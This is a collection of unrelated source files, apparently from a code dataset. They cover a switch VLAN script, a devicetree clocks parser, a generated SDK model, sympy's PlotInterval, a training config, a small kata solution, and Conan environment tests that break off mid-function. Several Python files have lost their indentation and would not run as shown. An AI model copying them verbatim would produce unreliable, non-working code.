parser.add_argument("vlan_id", help="VLAN number to create or remove", action="store", type=int)
parser.add_argument(
"--name",
help="Specify VLAN name",
action="store",
dest="vlan_name",
type=str
)
parser.add_argument("--remove", help="Remove the given VLAN ID", action="store_true")
cli_args = parser.parse_args()
vlan_id = cli_args.vlan_id
remove = cli_args.remove
    vlan_name = six.text_type(cli_args.vlan_name) if cli_args.vlan_name is not None else None
# Check if VLAN already exists
check_vlan = check_vlan_exists(eapi_conn, vlan_id)
# check if action is remove or add
if remove:
if check_vlan:
print("VLAN exists, removing it")
command_str = 'no vlan {}'.format(vlan_id)
eapi_conn.config([command_str])
else:
print("VLAN does not exist, no action required")
else:
if check_vlan:
if vlan_name is not None and check_vlan != vlan_name:
print("VLAN already exists, setting VLAN name")
configure_vlan(eapi_conn, vlan_id, vlan_name)
else:
print("VLAN already exists, no action required")
else:
print("Adding VLAN including vlan_name (if present)")
configure_vlan(eapi_conn, vlan_id, vlan_name)
if __name__ == "__main__":
main()
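# Illustrative sketch (not part of the original script): pyeapi.connect_to("pynet-sw2")
# resolves the switch from an eapi.conf file (e.g. ~/.eapi.conf); the entry below shows
# the expected shape with placeholder values.
#
#   [connection:pynet-sw2]
#   host: <switch-hostname-or-ip>
#   username: <user>
#   password: <password>
#   transport: https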
|
the-stack_106_12925
|
#
# Copyright (c) 2018 Bobby Noelte
#
# SPDX-License-Identifier: Apache-2.0
#
from extract.globals import *
from extract.directive import DTDirective
##
# @brief Manage clocks related directives.
#
# Handles:
# - clocks
# directives.
#
class DTClocks(DTDirective):
def __init__(self):
pass
def _extract_consumer(self, node_address, yaml, clocks, def_label):
clock_consumer = reduced[node_address]
clock_consumer_compat = get_compat(node_address)
clock_consumer_bindings = yaml[clock_consumer_compat]
clock_consumer_label = 'DT_' + get_node_label(node_address)
clock_index = 0
clock_cell_index = 0
nr_clock_cells = 0
clock_provider_node_address = ''
clock_provider = {}
for cell in clocks:
if clock_cell_index == 0:
if cell not in phandles:
raise Exception(
("Could not find the clock provider node {} for clocks"
" = {} in clock consumer node {}. Did you activate"
" the clock node?. Last clock provider: {}.")
.format(str(cell), str(clocks), node_address,
str(clock_provider)))
clock_provider_node_address = phandles[cell]
clock_provider = reduced[clock_provider_node_address]
clock_provider_compat = get_compat(clock_provider_node_address)
clock_provider_bindings = yaml[clock_provider_compat]
clock_provider_label = get_node_label( \
clock_provider_node_address)
nr_clock_cells = int(clock_provider['props'].get(
'#clock-cells', 0))
clock_cells_string = clock_provider_bindings.get(
'cell_string', 'CLOCK')
clock_cells_names = clock_provider_bindings.get(
'#cells', ['ID', 'CELL1', "CELL2", "CELL3"])
clock_cells = []
else:
clock_cells.append(cell)
clock_cell_index += 1
if clock_cell_index > nr_clock_cells:
# clock consumer device - clocks info
#####################################
prop_def = {}
prop_alias = {}
# Legacy clocks definitions by extract_cells
for i, cell in enumerate(clock_cells):
if i >= len(clock_cells_names):
clock_cell_name = 'CELL{}'.format(i)
else:
clock_cell_name = clock_cells_names[i]
if clock_cells_string == clock_cell_name:
clock_label = self.get_label_string([
clock_consumer_label, clock_cells_string,
str(clock_index)])
else:
clock_label = self.get_label_string([
clock_consumer_label, clock_cells_string,
clock_cell_name, str(clock_index)])
prop_def[clock_label] = str(cell)
if clock_index == 0 and \
len(clocks) == (len(clock_cells) + 1):
index = ''
else:
index = str(clock_index)
if node_address in aliases:
if clock_cells_string == clock_cell_name:
add_prop_aliases(
node_address,
yaml,
lambda alias:
self.get_label_string([
alias,
clock_cells_string,
index]),
clock_label,
prop_alias)
else:
add_prop_aliases(
node_address,
yaml,
lambda alias:
self.get_label_string([
alias,
clock_cells_string,
clock_cell_name,
index]),
clock_label,
prop_alias)
# alias
if i < nr_clock_cells:
# clocks info for first clock
clock_alias_label = self.get_label_string([
clock_consumer_label, clock_cells_string,
clock_cell_name])
prop_alias[clock_alias_label] = clock_label
# Legacy clocks definitions by extract_controller
clock_provider_label_str = clock_provider['props'].get('label',
None)
if clock_provider_label_str is not None:
try:
generation = clock_consumer_bindings['properties'][
'clocks']['generation']
except:
generation = ''
if 'use-prop-name' in generation:
clock_cell_name = 'CLOCKS_CONTROLLER'
else:
clock_cell_name = 'CLOCK_CONTROLLER'
if clock_index == 0 and \
len(clocks) == (len(clock_cells) + 1):
index = ''
else:
index = str(clock_index)
clock_label = self.get_label_string([clock_consumer_label,
clock_cell_name,
index])
prop_def[clock_label] = '"' + clock_provider_label_str + '"'
if node_address in aliases:
add_prop_aliases(
node_address,
yaml,
lambda alias:
self.get_label_string([
alias,
clock_cell_name,
index]),
clock_label,
prop_alias)
insert_defs(node_address, prop_def, prop_alias)
clock_cell_index = 0
clock_index += 1
##
# @brief Extract clocks related directives
#
# @param node_address Address of node owning the clockxxx definition.
# @param yaml YAML definition for the owning node.
# @param prop clockxxx property name
# @param def_label Define label string of node owning the directive.
#
def extract(self, node_address, yaml, prop, def_label):
properties = reduced[node_address]['props'][prop]
prop_list = []
if not isinstance(properties, list):
prop_list.append(properties)
else:
prop_list = list(properties)
if prop == 'clocks':
# indicator for clock consumers
self._extract_consumer(node_address, yaml, prop_list, def_label)
else:
raise Exception(
"DTClocks.extract called with unexpected directive ({})."
.format(prop))
##
# @brief Management information for clocks.
clocks = DTClocks()
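# Illustrative sketch (not part of the original module): for a devicetree fragment along
# the lines of
#
#   uart0: serial@40002000 {
#       clocks = <&rcc 0x1 0x4>;
#   };
#
# the extract() hook above walks the 'clocks' cells and emits defines such as
# DT_<NODE_LABEL>_CLOCK_CONTROLLER and DT_<NODE_LABEL>_CLOCK_ID; the exact names depend
# on the provider binding's 'cell_string' and '#cells' entries.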
|
the-stack_106_12928
|
#!/usr/bin/python
#
# Copyright 2018-2020 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Polyaxon SDKs and REST API specification.
Polyaxon SDKs and REST API specification. # noqa: E501
The version of the OpenAPI document: 1.0.79
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from polyaxon_sdk.configuration import Configuration
class V1SparkReplica(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
"replicas": "int",
"environment": "V1Environment",
"init": "list[V1Init]",
"sidecars": "list[V1Container]",
"container": "V1Container",
}
attribute_map = {
"replicas": "replicas",
"environment": "environment",
"init": "init",
"sidecars": "sidecars",
"container": "container",
}
def __init__(
self,
replicas=None,
environment=None,
init=None,
sidecars=None,
container=None,
local_vars_configuration=None,
): # noqa: E501
"""V1SparkReplica - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._replicas = None
self._environment = None
self._init = None
self._sidecars = None
self._container = None
self.discriminator = None
if replicas is not None:
self.replicas = replicas
if environment is not None:
self.environment = environment
if init is not None:
self.init = init
if sidecars is not None:
self.sidecars = sidecars
if container is not None:
self.container = container
@property
def replicas(self):
"""Gets the replicas of this V1SparkReplica. # noqa: E501
:return: The replicas of this V1SparkReplica. # noqa: E501
:rtype: int
"""
return self._replicas
@replicas.setter
def replicas(self, replicas):
"""Sets the replicas of this V1SparkReplica.
:param replicas: The replicas of this V1SparkReplica. # noqa: E501
:type: int
"""
self._replicas = replicas
@property
def environment(self):
"""Gets the environment of this V1SparkReplica. # noqa: E501
:return: The environment of this V1SparkReplica. # noqa: E501
:rtype: V1Environment
"""
return self._environment
@environment.setter
def environment(self, environment):
"""Sets the environment of this V1SparkReplica.
:param environment: The environment of this V1SparkReplica. # noqa: E501
:type: V1Environment
"""
self._environment = environment
@property
def init(self):
"""Gets the init of this V1SparkReplica. # noqa: E501
:return: The init of this V1SparkReplica. # noqa: E501
:rtype: list[V1Init]
"""
return self._init
@init.setter
def init(self, init):
"""Sets the init of this V1SparkReplica.
:param init: The init of this V1SparkReplica. # noqa: E501
:type: list[V1Init]
"""
self._init = init
@property
def sidecars(self):
"""Gets the sidecars of this V1SparkReplica. # noqa: E501
:return: The sidecars of this V1SparkReplica. # noqa: E501
:rtype: list[V1Container]
"""
return self._sidecars
@sidecars.setter
def sidecars(self, sidecars):
"""Sets the sidecars of this V1SparkReplica.
:param sidecars: The sidecars of this V1SparkReplica. # noqa: E501
:type: list[V1Container]
"""
self._sidecars = sidecars
@property
def container(self):
"""Gets the container of this V1SparkReplica. # noqa: E501
:return: The container of this V1SparkReplica. # noqa: E501
:rtype: V1Container
"""
return self._container
@container.setter
def container(self, container):
"""Sets the container of this V1SparkReplica.
:param container: The container of this V1SparkReplica. # noqa: E501
:type: V1Container
"""
self._container = container
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1SparkReplica):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1SparkReplica):
return True
return self.to_dict() != other.to_dict()
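# Illustrative usage sketch (not part of the generated file): V1SparkReplica is a plain data
# holder, so it can be constructed directly and serialized with to_dict().
if __name__ == "__main__":
    replica = V1SparkReplica(replicas=2)
    print(replica.to_dict())  # {'replicas': 2, 'environment': None, 'init': None, ...}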
|
the-stack_106_12929
|
from __future__ import print_function, division
from sympy import Symbol, sympify
from sympy.core.numbers import Integer
class PlotInterval(object):
"""
"""
_v, _v_min, _v_max, _v_steps = None, None, None, None
def require_all_args(f):
def check(self, *args, **kwargs):
for g in [self._v, self._v_min, self._v_max, self._v_steps]:
if g is None:
raise ValueError("PlotInterval is incomplete.")
return f(self, *args, **kwargs)
return check
def __init__(self, *args):
if len(args) == 1:
if isinstance(args[0], PlotInterval):
self.fill_from(args[0])
return
elif isinstance(args[0], str):
try:
args = eval(args[0])
except TypeError:
s_eval_error = "Could not interpret string %s."
raise ValueError(s_eval_error % (args[0]))
elif isinstance(args[0], (tuple, list)):
args = args[0]
else:
raise ValueError("Not an interval.")
if not isinstance(args, (tuple, list)) or len(args) > 4:
f_error = "PlotInterval must be a tuple or list of length 4 or less."
raise ValueError(f_error)
args = list(args)
if len(args) > 0 and (args[0] is None or isinstance(args[0], Symbol)):
self.v = args.pop(0)
if len(args) in [2, 3]:
self.v_min = args.pop(0)
self.v_max = args.pop(0)
if len(args) == 1:
self.v_steps = args.pop(0)
elif len(args) == 1:
self.v_steps = args.pop(0)
def get_v(self):
return self._v
def set_v(self, v):
if v is None:
self._v = None
return
if not isinstance(v, Symbol):
raise ValueError("v must be a sympy Symbol.")
self._v = v
def get_v_min(self):
return self._v_min
def set_v_min(self, v_min):
if v_min is None:
self._v_min = None
return
try:
self._v_min = sympify(v_min)
float(self._v_min.evalf())
except TypeError:
raise ValueError("v_min could not be interpreted as a number.")
def get_v_max(self):
return self._v_max
def set_v_max(self, v_max):
if v_max is None:
self._v_max = None
return
try:
self._v_max = sympify(v_max)
float(self._v_max.evalf())
except TypeError:
raise ValueError("v_max could not be interpreted as a number.")
def get_v_steps(self):
return self._v_steps
def set_v_steps(self, v_steps):
if v_steps is None:
self._v_steps = None
return
if isinstance(v_steps, int):
v_steps = Integer(v_steps)
elif not isinstance(v_steps, Integer):
raise ValueError("v_steps must be an int or sympy Integer.")
if v_steps <= Integer(0):
raise ValueError("v_steps must be positive.")
self._v_steps = v_steps
@require_all_args
def get_v_len(self):
return self.v_steps + 1
v = property(get_v, set_v)
v_min = property(get_v_min, set_v_min)
v_max = property(get_v_max, set_v_max)
v_steps = property(get_v_steps, set_v_steps)
v_len = property(get_v_len)
def fill_from(self, b):
if b.v is not None:
self.v = b.v
if b.v_min is not None:
self.v_min = b.v_min
if b.v_max is not None:
self.v_max = b.v_max
if b.v_steps is not None:
self.v_steps = b.v_steps
@staticmethod
def try_parse(*args):
"""
Returns a PlotInterval if args can be interpreted
as such, otherwise None.
"""
if len(args) == 1 and isinstance(args[0], PlotInterval):
return args[0]
try:
return PlotInterval(*args)
except ValueError:
return None
def _str_base(self):
return ",".join(
[str(self.v), str(self.v_min), str(self.v_max), str(self.v_steps)]
)
def __repr__(self):
"""
A string representing the interval in class constructor form.
"""
return "PlotInterval(%s)" % (self._str_base())
def __str__(self):
"""
A string representing the interval in list form.
"""
return "[%s]" % (self._str_base())
@require_all_args
def assert_complete(self):
pass
@require_all_args
def vrange(self):
"""
Yields v_steps+1 sympy numbers ranging from
v_min to v_max.
"""
d = (self.v_max - self.v_min) / self.v_steps
for i in range(self.v_steps + 1):
a = self.v_min + (d * Integer(i))
yield a
@require_all_args
def vrange2(self):
"""
Yields v_steps pairs of sympy numbers ranging from
(v_min, v_min + step) to (v_max - step, v_max).
"""
d = (self.v_max - self.v_min) / self.v_steps
a = self.v_min + (d * Integer(0))
for i in range(self.v_steps):
b = self.v_min + (d * Integer(i + 1))
yield a, b
a = b
def frange(self):
for i in self.vrange():
yield float(i.evalf())
|
the-stack_106_12932
|
import numpy as np
def init(mdlParams_):
mdlParams = {}
# Save summaries and model here
mdlParams['saveDir'] = './models/model_ham_effb1_binary'
mdlParams['model_load_path'] = ''
# Data is loaded from here
mdlParams['dataDir'] = './Data'
mdlParams['with_meta'] = False
mdlParams['meta_path'] = './ham_meta.pkl'
### Model Selection ###
mdlParams['model_type'] = 'efficientnet-b1'
mdlParams['numClasses'] = 2
mdlParams['balance_classes'] = 2
mdlParams['numOut'] = mdlParams['numClasses']
# Scale up for b1-b7
mdlParams['crop_size'] = [280, 280]
mdlParams['input_size'] = [240, 240, 3]
mdlParams['focal_loss'] = True
### Training Parameters ###
# Batch size
mdlParams['batchSize'] = 20 # *len(mdlParams['numGPUs'])
# Initial learning rate
mdlParams['learning_rate'] = 0.000015 # *len(mdlParams['numGPUs'])
    # Lower learning rate after no improvement over this many epochs
mdlParams['lowerLRAfter'] = 25
# If there is no validation set, start lowering the LR after X steps
mdlParams['lowerLRat'] = 50
# Divide learning rate by this value
mdlParams['LRstep'] = 5
# Maximum number of training iterations
mdlParams['training_steps'] = 60
# Display error every X steps
mdlParams['display_step'] = 2
# Scale?
mdlParams['scale_targets'] = False
    # Peek at test error during training? (generally, don't do this!)
mdlParams['peak_at_testerr'] = False
# Print trainerr
mdlParams['print_trainerr'] = False
# Subtract trainset mean?
mdlParams['subtract_set_mean'] = False
mdlParams['setMean'] = np.array([0.0, 0.0, 0.0])
mdlParams['setStd'] = np.array([1.0, 1.0, 1.0])
# Cross validation
mdlParams['fold'] = 5
# Data AUG
# mdlParams['full_color_distort'] = True
mdlParams['autoaugment'] = False
mdlParams['flip_lr_ud'] = True
mdlParams['full_rot'] = 180
mdlParams['scale'] = (0.8, 1.2)
mdlParams['shear'] = 10
mdlParams['cutout'] = 16
mdlParams['only_downsmaple'] = False
# Meta settings
mdlParams['meta_features'] = ['age_0.0', 'age_5.0',
'age_10.0', 'age_15.0', 'age_20.0', 'age_25.0', 'age_30.0', 'age_35.0',
'age_40.0', 'age_45.0', 'age_50.0', 'age_55.0', 'age_60.0', 'age_65.0',
'age_70.0', 'age_75.0', 'age_80.0', 'age_85.0', 'sex_female',
'sex_male', 'sex_unknown', 'localization_abdomen', 'localization_acral',
'localization_back', 'localization_chest', 'localization_ear',
'localization_face', 'localization_foot', 'localization_genital',
'localization_hand', 'localization_lower extremity',
'localization_neck', 'localization_scalp', 'localization_trunk',
'localization_unknown', 'localization_upper extremity']
mdlParams['fc_layers_before'] = [256, 256]
# Factor for scaling up the FC layer
scale_up_with_larger_b = 1.0
mdlParams['fc_layers_after'] = [int(1024 * scale_up_with_larger_b)]
mdlParams['freeze_cnn'] = False
mdlParams['learning_rate_meta'] = 0.00001
# Normal dropout in fc layers
mdlParams['dropout_meta'] = 0.4
return mdlParams
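# Typical use (an assumption, not shown in this file): import this module as a config
# and build the parameter dict at training start, e.g. mdlParams = cfg_module.init({}).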
|
the-stack_106_12935
|
# https://www.codewars.com/kata/how-good-are-you-really
def better_than_average(class_points, your_points):
    # True when your score is strictly above the class average (same behavior as the
    # original loop, without shadowing the built-in sum).
    return your_points > sum(class_points) / len(class_points)
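# Examples: better_than_average([2, 3], 5) -> True (5 > 2.5),
#           better_than_average([100, 90], 11) -> False (11 <= 95).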
|
the-stack_106_12937
|
import os
import platform
import unittest
from nose.plugins.attrib import attr
from conans.client import tools
from conans.client.generators.text import TXTGenerator
from conans.model.info import ConanInfo
from conans.model.ref import ConanFileReference, PackageReference
from conans.paths import BUILD_INFO, CONANFILE, CONANINFO
from conans.test.utils.cpp_test_files import cpp_hello_conan_files
from conans.test.utils.tools import TestClient
from conans.util.files import load
class ConanEnvTest(unittest.TestCase):
@attr('slow')
def shared_in_current_directory_test(self):
"""
- There is a package building a shared library
- There is a consumer project importing the shared library (and the executable)
- The consumer tries to execute the imported shared library and executable in the same
          directory, and it fails on Linux, but works on OSX and Windows.
        - Then I move the shared library to a different directory, and it fails;
          I'm making sure that there are no hardcoded rpaths messing things up.
        - Finally I use the virtualrunenvironment that declares the LD_LIBRARY_PATH,
          PATH and DYLD_LIBRARY_PATH to run the executable, and... magic!
          It runs against the shared library in the local cache.
"""
conanfile = """
from conans import ConanFile, CMake, tools
class LibConan(ConanFile):
name = "lib"
version = "1.0"
settings = "os", "compiler", "build_type", "arch"
options = {"shared": [True, False]}
default_options = "shared=True"
generators = "cmake"
exports_sources = "*"
def build(self):
cmake = CMake(self)
self.run('cmake %s' % cmake.command_line)
self.run("cmake --build . %s" % cmake.build_config)
def package(self):
self.copy("*.h", dst="include", src="hello")
self.copy("*.lib", dst="lib", keep_path=False)
self.copy("*.dll", dst="bin", keep_path=False)
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.dylib", dst="lib", keep_path=False)
self.copy("*main*", dst="bin", keep_path=False)
"""
cmakelists = """
set(CMAKE_CXX_COMPILER_WORKS 1)
set(CMAKE_CXX_ABI_COMPILED 1)
project(mytest)
SET(CMAKE_SKIP_RPATH 1)
ADD_LIBRARY(hello SHARED hello.c)
ADD_EXECUTABLE(main main.c)
TARGET_LINK_LIBRARIES(main hello)
"""
hello_h = """#pragma once
#ifdef WIN32
#define HELLO_EXPORT __declspec(dllexport)
#else
#define HELLO_EXPORT
#endif
HELLO_EXPORT void hello();
"""
client = TestClient()
files = {CONANFILE: conanfile,
"CMakeLists.txt": cmakelists,
"hello.c": '#include "hello.h"\nvoid hello(){\nreturn;}',
"hello.h": hello_h,
"main.c": '#include "hello.h"\nint main(){\nhello();\nreturn 0;\n}'}
client.save(files)
client.run("export . conan/stable")
client.run("install lib/1.0@conan/stable -o lib:shared=True --build missing")
client.save({"conanfile.txt": '''
[requires]
lib/1.0@conan/stable
[generators]
virtualrunenv
[imports]
bin, * -> ./bin
lib, * -> ./bin
'''}, clean_first=True)
client.run("install .")
# Break possible rpaths built in the exe with absolute paths
os.rename(os.path.join(client.current_folder, "bin"),
os.path.join(client.current_folder, "bin2"))
with tools.chdir(os.path.join(client.current_folder, "bin2")):
if platform.system() == "Windows":
self.assertEqual(os.system("main.exe"), 0)
elif platform.system() == "Darwin":
self.assertEqual(os.system("./main"), 0)
else:
self.assertNotEqual(os.system("./main"), 0)
self.assertEqual(os.system("LD_LIBRARY_PATH=$(pwd) ./main"), 0)
self.assertEqual(os.system("LD_LIBRARY_PATH=. ./main"), 0)
            # If we move the shared library it won't work, unless we use the virtualrunenv
os.mkdir(os.path.join(client.current_folder, "bin2", "subdir"))
name = {"Darwin": "libhello.dylib",
"Windows": "hello.dll"}.get(platform.system(), "libhello.so")
os.rename(os.path.join(client.current_folder, "bin2", name),
os.path.join(client.current_folder, "bin2", "subdir", name))
if platform.system() == "Windows":
self.assertNotEqual(os.system("main.exe"), 0)
elif platform.system() == "Darwin":
self.assertNotEqual(os.system("./main"), 0)
else:
self.assertNotEqual(os.system("LD_LIBRARY_PATH=$(pwd) ./main"), 0)
# Will use the shared from the local cache
if platform.system() != "Windows":
command = "bash -c 'source ../activate_run.sh && ./main'"
else:
command = "cd .. && activate_run.bat && cd bin2 && main.exe"
self.assertEqual(os.system(command), 0)
def test_package_env_working(self):
client = TestClient()
conanfile = """from conans import ConanFile
class MyPkg(ConanFile):
name = "Pkg"
version = "0.1"
"""
test_conanfile = """from conans import ConanFile
import os
class MyTest(ConanFile):
requires = "Pkg/0.1@lasote/testing"
def build(self):
self.output.warn('MYVAR==>%s' % os.environ.get('MYVAR', ""))
def test(self):
pass
"""
client.save({"conanfile.py": conanfile,
"test_package/conanfile.py": test_conanfile})
client.run("create . lasote/testing -e MYVAR=MYVALUE")
self.assertIn("MYVAR==>MYVALUE", client.out)
def deactivate_env_inheritance_test(self):
client = TestClient()
conanfile = """from conans import ConanFile
class MyPkg(ConanFile):
def package_info(self):
self.env_info.SOME_VAR.append("22")
"""
client.save({"conanfile.py": conanfile})
client.run("create . Pkg/0.1@lasote/testing")
conanfile = """from conans import ConanFile
import os
class MyLib(ConanFile):
apply_env = False
requires = "Pkg/0.1@lasote/testing"
def _test(self):
assert("SOME_VAR" not in os.environ)
assert(self.deps_env_info["Pkg"].SOME_VAR == ["22"])
def build(self):
self._test()
def package(self):
self._test()
def package_info(self):
self._test()
def build(self):
self._test()
def imports(self):
self._test()
"""
client.save({"conanfile.py": conanfile})
client.run("create . MyLib/0.1@lasote/testing")
# Now as a build require, should be the same
client.save({"conanfile.py": conanfile.replace("requires =", "#requires ="),
"myprofile": "[build_requires]\nPkg/0.1@lasote/testing"})
client.run("create . MyLib/0.1@lasote/testing --profile ./myprofile")
def env_path_order_test(self):
client = TestClient()
with tools.environment_append({"SOME_VAR": ["INITIAL VALUE"]}):
conanfile = """from conans import ConanFile
import os
class MyPkg(ConanFile):
def build(self):
self.output.info("PKG VARS: %s" % os.getenv("SOME_VAR"))
def package_info(self):
self.env_info.SOME_VAR.append("OTHER_VALUE")
"""
client.save({"conanfile.py": conanfile})
client.run("create . Pkg/0.1@lasote/testing")
self.assertIn("Pkg/0.1@lasote/testing: PKG VARS: INITIAL VALUE", client.out)
conanfile = """from conans import ConanFile
import os
class MyTest(ConanFile):
requires = "Pkg/0.1@lasote/testing"
def build(self):
self.output.info("TEST VARS: %s" % os.getenv("SOME_VAR"))
def package_info(self):
self.env_info.SOME_VAR.extend(["OTHER_VALUE2", "OTHER_VALUE3"])
"""
client.save({"conanfile.py": conanfile})
client.run("create . Test/0.1@lasote/testing")
# FIXME: Note that these values are os.pathsep (; or :)
self.assertIn("Test/0.1@lasote/testing: TEST VARS: OTHER_VALUE%sINITIAL VALUE"
% os.pathsep,
client.out)
conanfile = """from conans import ConanFile
import os
class MyTest(ConanFile):
requires = "Test/0.1@lasote/testing"
def build(self):
self.output.info("PROJECT VARS: %s" % os.getenv("SOME_VAR"))
"""
client.save({"conanfile.py": conanfile})
client.run("create . project/0.1@lasote/testing")
self.assertIn("project/0.1@lasote/testing: PROJECT VARS: " +
os.pathsep.join(["OTHER_VALUE2", "OTHER_VALUE3",
"OTHER_VALUE", "INITIAL VALUE"]),
client.out)
client.run("create . project/0.1@lasote/testing -e SOME_VAR=[WHAT]")
self.assertIn("project/0.1@lasote/testing: PROJECT VARS: " +
os.pathsep.join(["WHAT", "OTHER_VALUE2", "OTHER_VALUE3",
"OTHER_VALUE", "INITIAL VALUE"]),
client.out)
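            # Precedence illustrated by the assertions above: values injected with -e come first,
            # then env_info from the dependencies closest to the consumer, then the pre-existing OS value.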
def test_run_env(self):
client = TestClient()
conanfile = '''
from conans import ConanFile
from conans.tools import mkdir
import os
class HelloConan(ConanFile):
name = "Hello"
version = "0.1"
build_policy = "missing"
def package_info(self):
mkdir(os.path.join(self.package_folder, "bin2"))
mkdir(os.path.join(self.package_folder, "lib2"))
self.cpp_info.bindirs.append("bin2")
self.cpp_info.libdirs.append("lib2")
'''
client.save({"conanfile.py": conanfile})
client.run("export . lasote/stable")
reuse = '''[requires]
Hello/0.1@lasote/stable
[generators]
virtualrunenv
'''
client.save({"conanfile.txt": reuse}, clean_first=True)
client.run("install .")
ext = "bat" if platform.system() == "Windows" else "sh"
self.assertTrue(os.path.exists(os.path.join(client.current_folder, "activate_run.%s" % ext)))
self.assertTrue(os.path.exists(os.path.join(client.current_folder, "deactivate_run.%s" % ext)))
environment_contents = client.load("environment_run.%s.env" % ext)
self.assertIn("PATH", environment_contents)
self.assertIn("LD_LIBRARY_PATH", environment_contents)
self.assertIn("DYLD_LIBRARY_PATH", environment_contents)
for line in environment_contents.splitlines():
if " PATH=" in line:
self.assertIn("bin2", line)
self.assertNotIn("lib2", line)
if " DYLD_LIBRARY_PATH=" in line:
self.assertNotIn("bin2", line)
self.assertIn("lib2", line)
if " LD_LIBRARY_PATH=" in line:
self.assertNotIn("bin2", line)
self.assertIn("lib2", line)
def dual_compiler_settings_and_env_test(self):
def patch_conanfile(conanfile):
return conanfile + '''
def build(self):
import os
self.output.warn("COMPILER: %s=>%s" % (self.name, self.settings.compiler))
self.output.warn("CXX: %s=>%s" % (self.name, os.environ["CXX"]))
self.output.warn("CC: %s=>%s" % (self.name, os.environ["CC"]))
'''
client = TestClient()
files = cpp_hello_conan_files("Hello0", "1.0", deps=[], build=False)
files[CONANFILE] = patch_conanfile(files[CONANFILE])
client.save(files)
client.run("export . lasote/stable")
files = cpp_hello_conan_files("Hello1", "1.0",
deps=["Hello0/1.0@lasote/stable"], build=False)
files[CONANFILE] = patch_conanfile(files[CONANFILE])
client.save(files)
client.run("export . lasote/stable")
# Both with same settings
client.run("install Hello1/1.0@lasote/stable --build -s compiler=gcc"
" -s compiler.version=4.6 -s compiler.libcxx=libstdc++11"
" -e CXX=/mycompilercxx -e CC=/mycompilercc")
self.assertIn("COMPILER: Hello0=>gcc", client.out)
self.assertIn("CXX: Hello0=>/mycompilercxx", client.out)
self.assertIn("CC: Hello0=>/mycompilercc", client.out)
self.assertIn("COMPILER: Hello1=>gcc", client.out)
self.assertIn("CXX: Hello1=>/mycompilercxx", client.out)
self.assertIn("CC: Hello1=>/mycompilercc", client.out)
# Different for Hello0
client.run("install Hello1/1.0@lasote/stable --build -s compiler=gcc"
" -s compiler.version=4.6 -s compiler.libcxx=libstdc++11"
" -e CXX=/mycompilercxx -e CC=/mycompilercc"
" -s Hello0:compiler=clang -s Hello0:compiler.version=3.7"
" -s Hello0:compiler.libcxx=libstdc++"
" -e Hello0:CXX=/othercompilercxx -e Hello0:CC=/othercompilercc")
self.assertIn("COMPILER: Hello0=>clang", client.out)
self.assertIn("CXX: Hello0=>/othercompilercxx", client.out)
self.assertIn("CC: Hello0=>/othercompilercc", client.out)
self.assertIn("COMPILER: Hello1=>gcc", client.out)
self.assertIn("CXX: Hello1=>/mycompilercxx", client.out)
self.assertIn("CC: Hello1=>/mycompilercc", client.out)
def conan_profile_unscaped_env_var_test(self):
client = TestClient()
conanfile = '''
from conans import ConanFile
class HelloConan(ConanFile):
name = "Hello"
version = "0.1"
'''
files = {"conanfile.py": conanfile}
client.save(files)
client.run("export . lasote/stable")
reuse = '''
[requires]
Hello/0.1@lasote/stable
[generators]
virtualenv
'''
profile = '''
[env]
CXXFLAGS=-fPIC -DPIC
'''
files = {"conanfile.txt": reuse, "myprofile": profile}
client.save(files, clean_first=True)
client.run("install . --profile ./myprofile --build missing")
with tools.chdir(client.current_folder):
if platform.system() != "Windows":
ret = os.system("chmod +x activate.sh && ./activate.sh")
else:
ret = os.system("activate.bat")
self.assertEqual(ret, 0)
def conan_env_deps_test(self):
client = TestClient()
conanfile = '''
from conans import ConanFile
class HelloConan(ConanFile):
name = "Hello"
version = "0.1"
def package_info(self):
self.env_info.var1="bad value"
self.env_info.var2.append("value2")
self.env_info.var3="Another value"
self.env_info.path = "/dir"
'''
files = {"conanfile.py": conanfile}
client.save(files)
client.run("export . lasote/stable")
conanfile = '''
from conans import ConanFile
class HelloConan(ConanFile):
name = "Hello2"
version = "0.1"
def config(self):
self.requires("Hello/0.1@lasote/stable")
def package_info(self):
self.env_info.var1="good value"
self.env_info.var2.append("value3")
self.env_info.CPPFLAGS.append("MYCPPFLAG=1")
'''
files["conanfile.py"] = conanfile
client.save(files, clean_first=True)
client.run("export . lasote/stable")
client.run("install Hello2/0.1@lasote/stable --build "
"-g virtualenv -e CPPFLAGS=[OtherFlag=2]")
ext = "bat" if platform.system() == "Windows" else "sh"
self.assertTrue(os.path.exists(os.path.join(client.current_folder, "activate.%s" % ext)))
self.assertTrue(os.path.exists(os.path.join(client.current_folder, "deactivate.%s" % ext)))
environment_contents = client.load("environment.%s.env" % ext)
deactivate_contents = client.load("deactivate.%s" % ext)
self.assertNotIn("bad value", environment_contents)
if platform.system() == "Windows":
self.assertIn("var1=good value", environment_contents)
else:
self.assertIn('var1="good value"', environment_contents)
if platform.system() == "Windows":
self.assertIn('var2=value3;value2;%var2%', environment_contents)
else:
